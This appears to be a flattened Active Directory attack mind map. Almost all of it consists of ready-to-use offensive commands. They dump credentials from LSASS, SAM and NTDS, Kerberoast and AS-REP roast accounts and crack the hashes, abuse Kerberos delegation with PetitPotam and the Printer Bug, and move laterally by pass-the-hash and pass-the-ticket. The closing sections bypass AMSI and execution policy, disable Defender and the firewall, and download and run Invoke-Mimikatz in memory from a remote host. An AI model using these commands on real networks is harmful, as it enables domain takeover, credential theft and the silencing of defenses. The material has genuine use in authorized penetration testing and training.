- Designed by : Youssef Saeed
- @y0u553f5433d
-
Icons
- PowerView
- Noisy
- Mimikatz
- Linux
- Rebeus
-
Dumping Credentials
-
Tools
-
mimikatz
- mimikatz.exe
- Invoke-Mimikatz.ps1
- SharpKatz.exe
- pypykatz.exe
-
Creds in memory
(LSASS)
-
MimiKatz
- Invoke-Mimikatz -Command '"sekurlsa::ekeys"'
-
CrackMapExec
- crackmapexec smb <IP> -u <USER> -p <PASS> --lsa
-
procdump
- 1- Get-Process -Name LSASS
2- .\procdump.exe -ma <ProcNum> lsass.dmp
-
lsassy
- lsassy -u <USER> -H <NTLM> -d <domain.full> <IP> --users
-
Local Creds
(SAM)
-
MimiKatz
- Invoke-Mimikatz -Command '"lsadump::sam"'
-
CrackMapExec
- crackmapexec smb <IP> -u <USER> -p <PASS> --sam
-
SecretDump
- 1- reg save HKLM\sam sam
2- reg save HKLM\system system
3- reg save HKLM\security security
- 4- impacket-secretsdump -sam sam -security security -system system LOCAL
-
Domain Creds
(ntds)
-
MimiKatz
- Invoke-Mimikatz -Command '"lsadump::dcsync /domain:<domain.full> /all"'
-
CrackMapExec
- crackmapexec smb <IP> -u <USER> -p <PASS> --ntds
-
SecretDump
- impacket-secretsdump <domain>/<USER>:<PASS>@<IP>
-
Lateral Movement
-
Kerberoasting
-
Found SPN
-
Extract Hashes
- specific account
- Rubeus.exe kerberoast /user:<user> /rc4opsec /outfile:hashes.txt
- Request-SPNTicket -SPN "<SPN>" -OutputFormat <Hashcat:John> | % { $_.Hash } > hashes.txt
- impacket-GetUserSPNs -request -dc-ip IP <Full.Domain>/<USER>:<PASSWORD> -request-user <USER> -outputfile hashes.txt
- all accounts
- Invoke-Kerberoast.ps1
- Invoke-Kerberoast -OutputFormat <Hashcat:John> | % { $_.Hash } > hashes.txt
- Get-DomainUser -SPN | Get-DomainSPNTicket -OutputFormat <Hashcat:John> > hashes.txt
- Rubeus.exe kerberoast /rc4opsec /outfile:hashes.txt
- crackmapexec ldap DC-IP -u <USER> -p <PASS> --kerberoasting hashes.txt
- impacket-GetUserSPNs -request -dc-ip IP <Full.Domain>/<USER>:<PASSWORD> -outputfile hashes.txt
- From memory to disk
- kerberos::list /export
-
Cracking Hashes
- John
- john --wordlist=<wordlist path> hashes.txt
- Hashcat
- hashcat -m 13100 --force -a 0 hashes.txt <wordlist path>
- Remove PortNumber From hashes if found before cracking
-
Set SPN
- Set-DomainObject -Identity <USER> -Set @{serviceprincipalname='Service/Name'}
-
ASREPRoast
-
Dumping Hashes
-
specific account
- ASREPRoast.ps1
- Get-ASREPHash -UserName <USER> -Verbose
-
all accounts
- Rubeus.exe asreproast /format:<hashcat:john> /outfile:hashes.txt
- crackmapexec ldap DC-IP -u <USER> -p <PASS> --asreproast hashes.txt
- GetNPUsers
- with Creds
- impacket-GetNPUsers -request -dc-ip <IP> <Full.Domain>/<USER>:<PASSWORD> -format <hashcat:john> -outputfile hashes.txt
- with users
- impacket-GetNPUsers -request -dc-ip IP -usersfile users .txt <Full.Domain>/ -format <hashcat:john> -outputfile hashes.txt
-
Cracking Hashes
-
John
- john --wordlist=<wordlist path> hashes.txt
-
Hashcat
- hashcat -m 18200 --force -a 0 hashes.txt <wordlist path>
-
Kerberos Delegation
-
Unconstrained Delegation
-
Basic
- Dumping Tickets
- Invoke-Mimikatz –Command '"sekurlsa::tickets /export"'
- Using Tickets
- Invoke-Mimikatz -Command '"kerberos::ptt <C:\Path\To\Ticket>"'
-
Using Exploits
- Setup Ticket monitoring
- Rubeus.exe monitor /interval:5 /nowrap
- Running Exploit
- Printer Bug
- .\MS-RPRN.exe \\dc.domain.com \\VulnMachine.domain.com
- PetitPotam
- .\PetitPotam.exe <VulnPC> <DC>
- Using Tickets
- Rubeus.exe ptt /tikcet:<base64 Ticket from monitoring>
-
Constrained Delegation
-
Have User's hash
- Using Mimi and Kekeo
- Request TGT
- kekeo# tgt::ask /user:<User> /domain:<Full.Domain.com> /rc4:<Hash>
- Request TGS
- kekeo# tgs::s4u /tgt:<TGT-File>.kirbi /user:Administrator@Domain.com /service:<cifs>/<PC.Domain.com>
- inject the ticket
- Invoke-Mimikatz -Command '"kerberos::ptt <Ticket>.kirbi"'
- Using Rubeus
- Rubeus.exe s4u /user:websvc /aes256:<User's AES> /impersonateuser:Administrator /msdsspn:service/pc.domain.com /ptt
-
Have Computer's hash
- Using Mimi and Kekeo
- Request TGT
- kekeo# tgt::ask /user:<User> /domain:<Full.Domain.com> /rc4:<Hash>
- Request TGS
- kekeo# tgs::s4u /tgt:<TGT-File>.kirbi /user:Administrator@Domain.com /service:<cifs/PC.Domain.com
- inject the ticket
- Invoke-Mimikatz -Command '"kerberos::ptt <Ticket>.kirbi"'
- Using Rubeus
- Rubeus.exe s4u /user:websvc /aes256:<User's AES> /impersonateuser:Administrator /msdsspn:service/PC.domain.com /ptt
-
Resource Based
- Set-ADComputer -Identity dcorp-mgmt -PrincipalsAllowedToDelegateToAccount <YourPWNedHost$>
- Rubeus.exe s4u /user:<Pwned PC>$ /aes256:<PC$ aes256> /msdsspn:<SVC>/<SVCMachine> /impersonateuser:administrator /ptt
-
Enumration
-
BloodHound Enum
-
BloodHound
-
SharpHound.ps1
- Invoke-BloodHound -CollectionMethod All
- Invoke-BloodHound -CollectionMethod All -ExcludeDC
- PowerView Enum
-
Advanced Domain Enumeration
-
Local Admin Access
- Find-LocalAdminAccess –Verbose
- Find-WMILocalAdminAccess.ps1
- Find-PSRemotingLocalAdminAccess.ps1
-
Password Hardening
- $FormatEnumerationLimit=-1;Get-DomainUser -LDAPFilter '(userPassword=*)' -Properties samaccountname,memberof,userPassword | % {Add-Member -InputObject $_ NoteProperty 'Password' "$([System.Text.Encoding]::ASCII.GetString($_.userPassword))" -PassThru} | fl
-
Kerberoasting
-
Find SPNs
- Get-DomainUser -SPN | select samaccountname,serviceprincipalname
- impacket-GetUserSPNs -request -dc-ip IP <Full.Domain>/<USER>:<PASSWORD>
- Rubeus.exe kerberoast /stats
-
Set SPNs
- Making sure user have no SPN
- Get-DomainUser -Identity <USER> | select serviceprincipalname
- Found ?
- Found ?
-
ASREPRoast
- Get-DomainUser -PreauthNotRequired -Verbose
- impacket-GetNPUsers -request -dc-ip IP <Full.Domain>/<USER>:<PASSWORD>
-
ASREPRoast.ps1
- Invoke-ASREPRoast -Verbose
-
Kerberos Delegation
-
Unconstrained
- Get-DomainComputer -Unconstrained | select name,logoncount,descreption,operatingsystem
- Found ?
-
Constrained
- Users Enum
- Get-DomainUser –TrustedToAuth | select samaccountname,logoncount,msds-allowedtodelegateto | fl
- Computers Enum
- Get-DomainComputer –TrustedToAuth | select name,logoncount,descreption,operatingsystem,msds-allowedtodelegateto | fl
-
Resource Based
- Find-InterestingDomainACL | ?{$_.identityreferencename -match '<USER>'}
- Found ?
- Found ?
- Found ?
- Found ?
- Important
- Require DA Privs
-
Accessing
-
Have Legal Access ?
-
winrs
- winrs -r:<HOSTNAME> cmd
-
PsExec
- .\PsExec.exe \\<HOSTNAME> cmd
-
PS-Script
- 1- $sess = New-PSSession -ComputerName <HOST>
2- Enter-PSSession -Session $sess
- Interactive
-
Script Block
- 1- $sess = New-PSSession -ComputerName <HOST>
2- Invoke-Command -Session $Sess -ScriptBlock {ipconfig;whoami;pwd}
-
WSManWinRM
- Invoke-WSManWinRM -hostname <HOST> -command cmd
-
Have Password ?
- winrs -r:<HOST> -u:<Domain>/<USER> -p:<PASS> cmd
- .\PsExec.exe -u <Domain>/<USER> -p <PASS> \\<HOSTNAME> cmd
- impacket-psexec <<Domain>/<USER>:<PASS>@<IP>>
-
WSManWinRM
- Invoke-WSManWinRM -hostname <HOST> -command cmd -user <Domain>\<USER> -password <PASS>
- evil-winrm -i <IP> -u <Domain>/<USER>' -p <PASS>
-
RDP Access
- rdesktop -a 16 <IP> -u <DOMAIN\USER> -p <PASS>
- xfreerdp /v:IP /u:"<USER>" /p:<PASS>
-
Pass The Hash (PTH)
- Invoke-Mimikatz -Command '"sekurlsa::pth /user:<USER> /domain:<> /ntlm:<NTLM> /run:powershell.exe"'
- impacket-psexec -hashes ":<NTLM>" <USER>@<IP>
- evil-winrm -u <username> -H <Hash> -i <IP>
- pth-winexe -U <Domain>/<User>%<NT:LM> //<IP> cmd
-
Impacket For Win
- .\psexec_windows.exe -hashes ":<NTLM>" <USER>@<IP>
-
Invoke-TheHash
- Invoke-SMBExec -Target <PC.Full.Domain> -Domain <Full.Doamin> -Username <> -Hash <NTLM> -Command '<Inj SHELL>' -verbose
- Require RDP
-
OverPass The Hash (OPTH)
OR
Pass The Key (PTK)
-
Rubeus.exe asktgt /user:<USER> /rc4:<NTLM> /ptt
- .\PsExec.exe -accepteula \\<HOST> cmd
- winrs -r:<HOST> cmd
- Invoke-Mimikatz -Command '"sekurlsa::pth /user:<USER> /domain:<Full.Domain> /aes256:<aes256key> /run:cmd.exe"'
- 1- impacket-getTGT <domain.full>/<USER> -hashes ":<NTLM>"
2- export KRB5CCNAME=$(pwd)/<USER>.ccache
3- impacket-psexec <domain.full>/<USER>@<IP> -k -no-pass
-
Pass The Ticket (PTT)
- Invoke-Mimikatz -Command '"kerberos::ptt <C:\Path\To\Ticket>"'
- Rubeus.exe ptt /tikcet:<base64 Ticket>
-
Access
- .\PsExec.exe -accepteula \\<HOST> cmd
- winrs -r:<HOST> cmd
-
Gained Access
-
Have Reverse Shell?
-
Enable PS-Remoting
- Powershell -ep bypass Enable-PSRemoting -force
-
Enable RDP
- reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
-
Security Bypass
-
PowerShell
-
Current Language Mode
- $ExecutionContext.SessionState.LanguageMode
-
Execution Policy Bypass
- powershell –ExecutionPolicy bypass
- powershell –c <cmd>
- powershell –encodedcommand $env:PSExecutionPolicyPreference="bypass"
- Bypassed ?
-
AMSI
- AMSI Bypass PowerShell Command
-
Invisi-Shell
- If Administrator Access
- RunWithPathAsAdmin.bat
- If Not Administrator Access
- RunWithRegistryNonAdmin.bat
-
Importing your modules
-
Import Local file
- Import-Module .\PowerView.ps1
- . .\PowerUp.ps1
-
Import in memory
- powershell.exe -nop -exec bypass "IEX (New-Object Net.WebClient).DownloadString('http://IP/Invoke-Mimikatz.ps1')"
-
Stop Securties
-
Defender
- 1- Set-MpPreference -DisableRealtimeMonitoring $true; Get-MpComputerStatus
2- Set-MpPreference -DisableIOAVProtection $true
-
Disable AMSI
- Set-MpPreference -DisableScriptScanning 1
-
Firewall
- 1- netsh firewall set opmode disable
2- netsh Advfirewall set allprofiles state off